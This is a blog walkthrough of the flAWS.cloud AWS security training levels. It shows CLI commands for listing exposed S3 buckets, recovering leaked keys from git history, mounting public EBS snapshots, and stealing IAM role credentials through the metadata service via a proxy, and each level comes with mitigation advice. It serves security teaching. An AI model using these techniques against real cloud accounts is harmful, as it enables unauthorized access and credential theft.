
AWS Pentesting with flAWS.cloud: A step-by-step Walkthrough

7 min read · Jun 8, 2025


flAWS.cloud is an AWS security training platform featuring hands-on challenges that teach you about real-world attack surfaces in the AWS cloud, along with their mitigations.

Created by Scott Piper, this resource is highly recommended for beginners and professionals alike who are learning AWS pentesting or navigating the landscape of common cloud misconfigurations.

In this writeup, I’m going to present my own approach and step-by-step actions I took to solve the challenges. So let’s dive in!

LEVEL 1

This level requires you to list the contents of the S3 bucket behind the first sub-domain, hence the name "buckets of fun".

At first, I used Sublist3r to enumerate its subdomains. I noticed that the first domain listed (4b0cf…) resolves to an EC2 instance (this will come up at a later level).

I then realized that the flaws.cloud website is static, i.e., it could be an S3-hosted website. Let's see what the domain resolves to.

We see that it resolves to an S3 bucket, which means this is our first target. Now, let's list the bucket.
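Both checks can be reproduced from a terminal. A minimal sketch, assuming `dig` and the AWS CLI are installed (`--no-sign-request` makes the request anonymously):

```shell
# Resolve the domain; for S3 static website hosting it points at an
# s3-website endpoint, and the bucket name equals the domain name
dig +short flaws.cloud

# List the bucket contents without any AWS credentials
aws s3 ls s3://flaws.cloud/ --no-sign-request
```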

We see an interesting secret file. What does it say?

Congrats, we moved to level 2

How to avoid this?

Never grant everyone on the internet access to your data stored in the cloud.

Source: flAWS.Cloud by Scott Piper

LEVEL 2

This is similar to Level 1: we have to list the Level 2 S3 bucket.

Since we had already listed the subdomains earlier, let's try to list the bucket with our own AWS account credentials. Make sure your AWS CLI is set up.

We see a second secret. Unlike before, this has to be copied to your machine.
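Putting the two steps together, roughly (the Level 2 sub-domain comes from the earlier subdomain enumeration, and the secret filename is whatever the listing shows, so both are placeholders here):

```shell
# List the Level 2 bucket using our own (authenticated) AWS account
aws s3 ls s3://<level2-subdomain>.flaws.cloud/

# Unlike Level 1, the secret page must be copied locally to view it
aws s3 cp s3://<level2-subdomain>.flaws.cloud/<secret-file>.html .
```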

How to avoid?

Only allow specific users to access your bucket, not any authenticated AWS user.

Source: flAWS.Cloud by Scott Piper

LEVEL 3

This level's objective is to find an exposed AWS access key that could let us list other buckets.

Unlike the previous buckets, there's a .git folder when listing the Level 3 bucket.

In my case, I copied all of the bucket's contents to my system.
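One way to grab everything at once, assuming the Level 3 bucket also allows anonymous access (the sub-domain is a placeholder):

```shell
# Sync the whole Level 3 bucket, .git folder included, into ./level3
aws s3 sync s3://<level3-subdomain>.flaws.cloud/ ./level3 --no-sign-request
```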

Let's investigate the .git folder.

This commit message reveals that something sensitive was added before the latest commit. Let's check the earlier commits.

Check out the first commit to see if there's anything we shouldn't have access to.
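The git archaeology above boils down to a few commands (the commit hash is whatever `git log` reports as the oldest commit, and `level3` is the directory the bucket was copied into):

```shell
cd level3                          # directory the bucket was synced into
git log --oneline                  # view the commit history, newest first
git checkout <first-commit-hash>   # jump back to the oldest commit
ls -la                             # look for files removed in later commits
```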

And look what we have here! We've got the access key info.

Note: set the region to us-west-2.

Configure the keys under a new profile and check whether we can access more buckets.
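A sketch of the profile setup (the profile name `flaws` is my own choice):

```shell
# Store the leaked keys under a separate named profile
aws configure --profile flaws
# (paste the leaked Access Key ID and Secret Access Key; region us-west-2)

# Check what the compromised credentials can see
aws s3 ls --profile flaws
```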

How to avoid?

If keys are accidentally exposed, rotate your AWS access keys and delete the old ones.

LEVEL 4

We know this sub-domain is running an EC2 instance. On accessing the domain, we are prompted for a username and password, so we have to find the user credentials to access this webpage.

Let us check who we are and what permissions we have as the new user. And we don't have permission to check our own permissions. Well…
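Those two checks look roughly like this (the username for the second command comes from `get-caller-identity`; `backup` is an assumption here):

```shell
# Who do the leaked keys belong to?
aws sts get-caller-identity --profile flaws

# Attempting to read our own permissions is denied
aws iam list-attached-user-policies --user-name backup --profile flaws
```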

We are a backup user, so let's see if we have permissions for EC2 snapshots.
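Snapshot enumeration, sketched (the account ID comes from the `get-caller-identity` output):

```shell
# List EBS snapshots owned by the target account in us-west-2
aws ec2 describe-snapshots \
  --owner-ids <target-account-id> \
  --region us-west-2 --profile flaws
```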

Now, we need to inspect the snapshot. To do this, we’ll launch an EC2 instance, create a volume from the snapshot, and mount it to the /mnt directory on the EC2 instance.

# Create a volume from the target snapshot (same AZ as our instance)
aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

After creating the volume, attach it to our running instance in the AWS console.
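If you prefer the CLI over the console, the attach step looks like this (volume and instance IDs are placeholders; this runs under your own account):

```shell
# Attach the newly created volume to our own EC2 instance
aws ec2 attach-volume \
  --volume-id <vol-id-from-create-volume> \
  --instance-id <our-instance-id> \
  --device /dev/sdf \
  --region us-west-2
```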

Note: In my case, the volume is /dev/xvdf1

Mount the volume

sudo mount /dev/xvdf1 /mnt

Let’s see what’s in here

We know that the proxy used is Nginx, so setupNginx.sh looks promising to check out.
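Reading it from the mounted volume (the path assumes the snapshot's filesystem uses a standard Ubuntu home directory layout):

```shell
# Inspect the Nginx setup script on the mounted snapshot
cat /mnt/home/ubuntu/setupNginx.sh
```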

These user credentials were used to set up the Nginx proxy. Once we enter these credentials, we can access the webpage.

LEVEL 5

This challenge leads us to investigate the proxy and, hopefully, find credentials that can list the hidden directory in the Level 6 bucket.

Since we know this is an EC2 instance, let's check if we can reach its metadata service.
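Since the site proxies arbitrary URLs, we can point it at the instance metadata service (the EC2-backed sub-domain is the one found during subdomain enumeration, shown here as a placeholder):

```shell
# Ask the proxy to fetch the instance's IAM role name
curl "http://<ec2-subdomain>.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/"

# Then fetch the temporary credentials for that role
curl "http://<ec2-subdomain>.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>"
```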

Just like that, we are able to get the security credentials.

After configuring the CLI with the new credentials, we can list the Level 6 bucket and discover the hidden directory.
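Temporary instance-role credentials include a session token, which must be configured alongside the key pair (the profile name and bucket name are placeholders of my own):

```shell
# Configure all three values returned by the metadata service
aws configure set aws_access_key_id     <AccessKeyId>     --profile level5
aws configure set aws_secret_access_key <SecretAccessKey> --profile level5
aws configure set aws_session_token     <Token>           --profile level5

# Now listing the Level 6 bucket reveals the hidden directory
aws s3 ls s3://<level6-bucket>/ --profile level5
```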

How to avoid it?

Ensure your applications do not allow access to 169.254.169.254 or any local and private IP ranges. Additionally, ensure that IAM roles are restricted as much as possible.

LEVEL 6

In this last challenge, we get access to a new user with security-audit permissions.

Let's check the permissions available to us. Two policies are attached: MySecurityAudit and list_apigateways.

Let us list what each of these policies allows us to do. We see that the MySecurityAudit policy is overly permissive and allows us to perform actions on every resource.

The other policy, list_apigateways, as the name suggests, grants the apigateway:GET permission on the restapis/* resource, which allows us to list all available APIs under the "restapis" endpoint.
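The enumeration behind those observations, sketched (the user name, policy ARNs, and version IDs come from each previous command's output):

```shell
# What policies are attached to the Level 6 user?
aws iam list-attached-user-policies --user-name <level6-user> --profile level6

# Dump a policy's active version to see exactly what it allows
aws iam get-policy --policy-arn <policy-arn> --profile level6
aws iam get-policy-version \
  --policy-arn <policy-arn> --version-id <version-id> --profile level6
```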

Out of all the resources, we can guess that the Lambda functions may reveal something interesting.

There is a function named Level 6. What can this function do?

We see that this function is invoked through an API Gateway endpoint, with API ID s33ppypa75. The endpoint is called with the REST API ID, region, stage name, and resource name:
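To reach that conclusion, you can list the functions and read the function's resource policy (the function name here follows the level's naming and is an assumption; use whatever `list-functions` reports):

```shell
# Enumerate Lambda functions visible to the audit user
aws lambda list-functions --region us-west-2 --profile level6

# The resource policy reveals which API Gateway API may invoke it
aws lambda get-policy --function-name Level6 --region us-west-2 --profile level6
```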

https://<api-id>.execute-api.<region>.amazonaws.com/<Stage>/<Resource>

So let’s find the stage name
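The stage name can be pulled from API Gateway directly, using the API ID from the Lambda policy:

```shell
# List deployment stages for the REST API
aws apigateway get-stages --rest-api-id s33ppypa75 \
  --region us-west-2 --profile level6
```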

The stage name is Prod. Now that we know all the components, let’s send a curl request to the endpoint and observe the response.
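Assembling the invoke URL from the pieces we have (the resource path is left as a placeholder, since it comes from the API's resource listing):

```shell
# Build the API Gateway invoke URL from its components
API_ID="s33ppypa75"
REGION="us-west-2"
STAGE="Prod"
RESOURCE="<resource>"   # resource path from the API's configuration
URL="https://${API_ID}.execute-api.${REGION}.amazonaws.com/${STAGE}/${RESOURCE}"
echo "$URL"
```

A `curl` against this URL returns the final message.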

Great! We have completed the last challenge.

How to avoid?

Overly permissive policies are an open invitation to data breaches. Therefore, always follow the principle of least privilege, i.e., grant users only the permissions they need to perform specific tasks.

Thanks for Reading!

With this, we’ve completed all challenges. Feel free to share it with others diving into cloud security — and let me know your thoughts or what you’d like to see next!


Written by Aditya

